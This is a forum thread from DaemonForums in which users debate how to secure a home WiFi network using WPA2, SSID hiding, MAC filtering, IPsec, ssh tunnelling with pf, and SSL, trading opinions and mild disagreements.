DaemonForums  

Go Back   DaemonForums > Miscellaneous > General software and network

General software and network General OS-independent software and network questions, X11, MTA, routing, etc.

Reply
 
Thread Tools Display Modes
Old 18th November 2008
Oko's Avatar
Oko Oko is offline
Fsck Surgeon
 
Join Date: May 2008
Location: Kosovo, Serbia
Posts: 733
Thanked 36 Times in 32 Posts
Default

Quote:
Originally Posted by JMJ_coder View Post
That is the security I have implemented so far. I'm asking how secure (or insecure - I hope not ) that is and what else I can do to make it really secure?
man VPN and IPsec

Last edited by Oko; 18th November 2008 at 01:54 AM.
Reply With Quote
Old 18th November 2008
JMJ_coder JMJ_coder is offline
VPN Cryptographer
 
Join Date: May 2008
Posts: 464
Thanked 8 Times in 8 Posts
Default

Quote:
Originally Posted by Oko View Post
man VPN and IPSEC
O.K. - I found IPSEC and will read up on it. I couldn't find VPN - I saw OpenVPN (openvpn.net) in pkgsrc; is that what you are referring to?

Also, will this work with the gateway (AT&T 2701HG-B) that also needs to communicate via wired to the tower that is currently running Slackware and the laptop when I feel like plugging it in? The gateway is the access point, not the laptop - and the gateway doesn't have too many options (it's a consumer DSL) - I just wonder if the gateway can handle this.
__________________
And the WORD was made flesh, and dwelt among us. (John 1:14)
Reply With Quote
Old 18th November 2008
Oko's Avatar
Oko Oko is offline
Fsck Surgeon
 
Join Date: May 2008
Location: Kosovo, Serbia
Posts: 733
Thanked 36 Times in 32 Posts
Default

Quote:
Originally Posted by JMJ_coder View Post
O.K. - I found IPSEC and will read up on it. I couldn't find VPN - I saw OpenVPN (openvpn.net) in pkgsrc; is that what you are referring to?

Also, will this work with the gateway (AT&T 2701HG-B) that also needs to communicate via wired to the tower that is currently running Slackware and the laptop when I feel like plugging it in? The gateway is the access point, not the laptop - and the gateway doesn't have too many options (it's a consumer DSL) - I just wonder if the gateway can handle this.
OpenVPN is one of many different implementation of Virtual Private Network (VPN). It is very popular among Linux users. You do not want that one. It is very poor implementation which violates many RFC. You want IPsec.

Cheers,
OKO

Last edited by Oko; 18th November 2008 at 01:54 AM.
Reply With Quote
Old 18th November 2008
J65nko J65nko is offline
Administrator
 
Join Date: May 2008
Location: Budel - the Netherlands
Posts: 3,116
Thanked 182 Times in 149 Posts
Default

Or have a look at authpf http://netbsd.gw.com/cgi-bin/man-cgi?authpf++NetBSD-4.0
__________________
You don't need to be a genius to debug a pf.conf firewall ruleset, you just need the guts to run tcpdump
Reply With Quote
Old 18th November 2008
s2scott's Avatar
s2scott s2scott is offline
Package Pilot
 
Join Date: May 2008
Location: Toronto, Ontario Canada
Posts: 198
Thanked 9 Times in 8 Posts
Default

Quote:
Originally Posted by Oko View Post
OpenVPN ... you do not want that one. It is very poor implementation which violates many RFC. Cheers, OKO
Pardon?
__________________
Never argue with an idiot. They will bring you down to their level and beat you with experience.
Reply With Quote
Old 19th November 2008
Alphalutra1 Alphalutra1 is offline
Port Guard
 
Join Date: Sep 2008
Posts: 29
Thanked 0 Times in 0 Posts
Default

Quote:
Originally Posted by JMJ_coder View Post
... I'm asking how secure (or insecure - I hope not ) that is and what else I can do to make it really secure?
Since you have secured the network with WPA2, then disabling the SSID broadcast and MAC address filters are merely annoyances for you if you ever want to add more computers. "Disabling" the SSID broadcast does not disable all the signals it sends out so people still can see your network (many wireless cracking programs find it automagically). MAC addresses are always sent "in the clear" which means there is no encryption, so anyone who can even get one packet off your wireless communications between yourself and the router will know your MAC address and be able to clone it.

That being said, WPA2 at least right now, is only able to be cracked through brute force, so if you have a very strong key, I would say you are good to go. Of course, if you like experimenting, setting up OpenBSD with authpf and ipsec is always a fun weekend project for an alternative method of securing your router....

Cheers,

Alphalutra1
Reply With Quote
Old 19th November 2008
Oliver_H's Avatar
Oliver_H Oliver_H is offline
Real Name: Oliver Herold
UNIX lover
 
Join Date: May 2008
Location: Germany
Posts: 429
Thanked 26 Times in 22 Posts
Default

Point 2 and 6 are nonsense, myths of the net. WPA2 is good but if possible use VPN.
__________________
use UNIX or die :-)
Reply With Quote
Old 19th November 2008
s2scott's Avatar
s2scott s2scott is offline
Package Pilot
 
Join Date: May 2008
Location: Toronto, Ontario Canada
Posts: 198
Thanked 9 Times in 8 Posts
Default

Quote:
Originally Posted by Alphalutra1 View Post
...Of course, if you like experimenting, setting up OpenBSD with ...
I guard my WiFi using ssh with the "-w" option and disable WEP/WPA altogether (yields better throughput and superior security). See my old post @ http://www.daemonforums.org/showthread.php?t=141

While IPSec is the gold standard, it's tricky and the ssh is/was a lot easier (for our context).

/S
__________________
Never argue with an idiot. They will bring you down to their level and beat you with experience.
Reply With Quote
Old 19th November 2008
Alphalutra1 Alphalutra1 is offline
Port Guard
 
Join Date: Sep 2008
Posts: 29
Thanked 0 Times in 0 Posts
Default

Quote:
Originally Posted by s2scott View Post
I guard my WiFi using ssh with the "-w" option and disable WEP/WPA altogether (yields better throughput and superior security). See my old post @ http://www.daemonforums.org/showthread.php?t=141

While IPSec is the gold standard, it's tricky and the ssh is/was a lot easier (for our context).

/S
wow, that's awesome! I think I'm up for trying that in the next coming weekends with thanksgiving and all. Thanks for the tip!

Cheers,

Alphalutra1
Reply With Quote
Old 20th November 2008
JMJ_coder JMJ_coder is offline
VPN Cryptographer
 
Join Date: May 2008
Posts: 464
Thanked 8 Times in 8 Posts
Default

Quote:
Originally Posted by s2scott View Post
I guard my WiFi using ssh with the "-w" option and disable WEP/WPA altogether (yields better throughput and superior security). See my old post @ http://www.daemonforums.org/showthread.php?t=141

While IPSec is the gold standard, it's tricky and the ssh is/was a lot easier (for our context).

/S
Even if you ssh into the gateway, what's to prevent others from getting in? I might be missing something (and probably more than just one thing ), but that seems to secure your connection between your computer and the gateway and not the gateway from outside intruders.
__________________
And the WORD was made flesh, and dwelt among us. (John 1:14)
Reply With Quote
Old 20th November 2008
BSDfan666 BSDfan666 is offline
Real Name: N/A, this is the interweb.
Helpful companion
 
Join Date: Apr 2008
Location: Ontario, Canada
Posts: 2,223
Thanked 193 Times in 184 Posts
Default

Quote:
Originally Posted by JMJ_coder View Post
Even if you ssh into the gateway, what's to prevent others from getting in? I might be missing something (and probably more than just one thing ), but that seems to secure your connection between your computer and the gateway and not the gateway from outside intruders.
A carefully written pf ruleset would prevent wireless users from accessing the rest of your network.. and even your gateway.

If all you allow is SSH connectivity.. clients would be required to authenticate.. so unless they stole your key & passphrase, you should be safe.

Also, in that sort of setup... typically you wouldn't want to use password-only authentication.. as it would be brute forcible.
Reply With Quote
Old 21st November 2008
ai-danno's Avatar
ai-danno ai-danno is offline
Spam Deminer
 
Join Date: May 2008
Location: Boca Raton, Florida
Posts: 284
Thanked 35 Times in 31 Posts
Default

Quote:
Originally Posted by cabal View Post
Point 2 and 6 are nonsense, myths of the net. WPA2 is good but if possible use VPN.
This is not true- it's just that when employed as main line of security (without the other steps) you are not actually secure. Think of these two points when used with the others as 'shoring up your defenses'.


- SSID Broadcast: If the SSID is always being broadcast then a war-driver will see the network within a short period of time even when there are no clients using it. When the SSID broadcast is turned off, someone has to be using it at the time for a war driver to see the network.

- MAC filtering: if a client is not using the network, and the intruder spoofs the MAC address, then this line of defense is not relevant. But imagine you are using your MAC address when an intruder attempts to spoof yours for their own connection to the gateway- that leads to very funky, broken connections, and can tip off a user that something is amiss. Think of it as a tripwire.

So, to summarize, these steps taken on their own is not a wise path. But looking for the single "Holy Grail" of security isn't, either. Once your single 'ultimate solution' has a chink in it's armor, you are almost as insecure as using the above methods on their own. Using as many techniques at your disposal, on the other hand, will make things more difficult for an intruder, and can sometimes tip you off that there is even an intruder lurking in the first place.
__________________
Network Firefighter
Reply With Quote
Old 21st November 2008
s2scott's Avatar
s2scott s2scott is offline
Package Pilot
 
Join Date: May 2008
Location: Toronto, Ontario Canada
Posts: 198
Thanked 9 Times in 8 Posts
Default

Quote:
Originally Posted by JMJ_coder View Post
Even if you ssh into the gateway, what's to prevent others from getting in? I might be missing something (and probably more than just one thing )
If you look at the pf.conf fragment in the old post, it allows ssh traffic only on the wifi interface.

It's encrypted and authenticated traffic only.

/S
__________________
Never argue with an idiot. They will bring you down to their level and beat you with experience.

Last edited by s2scott; 21st November 2008 at 04:09 AM.
Reply With Quote
Old 21st November 2008
s2scott's Avatar
s2scott s2scott is offline
Package Pilot
 
Join Date: May 2008
Location: Toronto, Ontario Canada
Posts: 198
Thanked 9 Times in 8 Posts
Default

Quote:
Originally Posted by BSDfan666 View Post
If all you allow is SSH connectivity.. clients would be required to authenticate.. so unless they stole your key & passphrase, you should be safe.
Bingo.

Quote:
Originally Posted by BSDfan666 View Post
Also, in that sort of setup... typically you wouldn't want to use password-only authentication.. as it would be brute forcible.
Key & passphrase only.

Double bingo!


/S
__________________
Never argue with an idiot. They will bring you down to their level and beat you with experience.
Reply With Quote
Old 21st November 2008
richardpl richardpl is offline
Spam Deminer
 
Join Date: May 2008
Location: Croatia
Posts: 284
Thanked 25 Times in 24 Posts
Default

Quote:
Originally Posted by ai-danno View Post
- SSID Broadcast: If the SSID is always being broadcast then a war-driver will see the network within a short period of time even when there are no clients using it. When the SSID broadcast is turned off, someone has to be using it at the time for a war driver to see the network.
Also think of it like security through obscurity, that is all what hiding SSID is useful for. It also can increase latency, but it is not important in OP case.

Comparing with wired, wireless networks are not very safe/useful under DOS attacks. And anything can't help you in this situation, except if you invest some money in your home decoration
Reply With Quote
Old 21st November 2008
Oko's Avatar
Oko Oko is offline
Fsck Surgeon
 
Join Date: May 2008
Location: Kosovo, Serbia
Posts: 733
Thanked 36 Times in 32 Posts
Default

Quote:
Originally Posted by richardpl View Post
Also think of it like security through obscurity, that is all what hiding SSID is useful for.
Purger,

At least M$ got that one right To stay on the same note, I am shopping for SGI O2 to do my online banking. SGI O2+OpenBSD, I call that real security through obscurity.

Bok,
OKO
Reply With Quote
Old 17th April 2011
jonarthan12 jonarthan12 is offline
New User
 
Join Date: Apr 2011
Posts: 1
Thanked 0 Times in 0 Posts
Default

Hi JMJ,
You can protect your home network by using network access password. Be sure to register all devices on your network, including computers, laptops, media players, and networked storage if you are using MAC filtering. Also, be sure to enter the MAC addresses correctly as if you enter the wrong ones, you will not be able to connect the computer to the router to change them back and you will need to reset the router. Some routers allow you to save them while they are connected.

thanks!!
Reply With Quote
Old 18th April 2011
nilsgecko's Avatar
nilsgecko nilsgecko is offline
Port Guard
 
Join Date: Apr 2011
Location: Chicago, USA
Posts: 45
Thanked 0 Times in 0 Posts
Default Re: SSL

Quote:
Originally Posted by ai-danno View Post
No offense taken, in fact I appreciate the comment. But when you mention your wariness about SSL security, are you referring to a "man-in- the-middle" or attack? I think that those are do-able for sure, but I assume a low risk on them. Of course, low-risk is not no-risk, and I have not personally shopped online or done any online banking from a wireless hotspot. Also, the risk for a "man-in-the-middle" is also present on wired network paths, not just wireless, but again, the risk is low, and depends on the target website's implementation of SSL.

More to the point, I think that unless the site you are going to with sensitive information has properly implemented SSL (is completely SSL'd throughout the site and not just on authentication) then you shouldn't be visiting that site with sensitive information in the first place.

But if you are referring to something else... let me know. But my assumptions about SSL are that since it's encrypted traffic, and barring any insecure implementations of SSL, it's a secure way to communicate (aside from outlandish uber-hacker gangs and rogue governments... but if that's a realistic fear I wouldn't get online in the first place )

Here's a fun article about cracking SSL itself. I believe this refers to USA-export encryption, not domestic (which is stronger.) Here's another. This one is a more technical paper that describes the toughness of SSL.

I don't see where SSL would be considered insecure if properly implemented.
The biggest issue I would think is that it only authenticates from the Server
side, and doesn't authenticate the client. In other words, someone who can
gain access to your credentials (say online banking passwords etc) can
'authenticate' from anywhere since the session establishment is only one-way.

Also, as evidenced by the recent Comodo partner-hack, it can take some time before
a Certificate Authority finds out that a certificate has been issued by the
wrong hands....

SSL only works for TCP too, not UDP which as I understand it, things like VOIP
use.
Reply With Quote
Reply

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
how to secure my ftp? milo974 OpenBSD Security 3 4th August 2009 03:47 PM
Securing wifi networks with ipsec/ssh and openbsd Oko OpenBSD Security 4 16th April 2009 07:32 AM
Is this secure? Ungenious OpenBSD Security 4 30th November 2008 02:27 AM
I would like to secure a system kungfujesus OpenBSD Security 4 28th September 2008 04:30 PM
DMZ for two networks users... maurobottone OpenBSD Security 6 2nd June 2008 02:57 PM


All times are GMT. The time now is 09:26 AM.


Powered by vBulletin® Version 3.8.4
Copyright ©2000 - 2014, Jelsoft Enterprises Ltd.
Content copyright © 2007-2010, the authors
Daemon image copyright ©1988, Marshall Kirk McKusick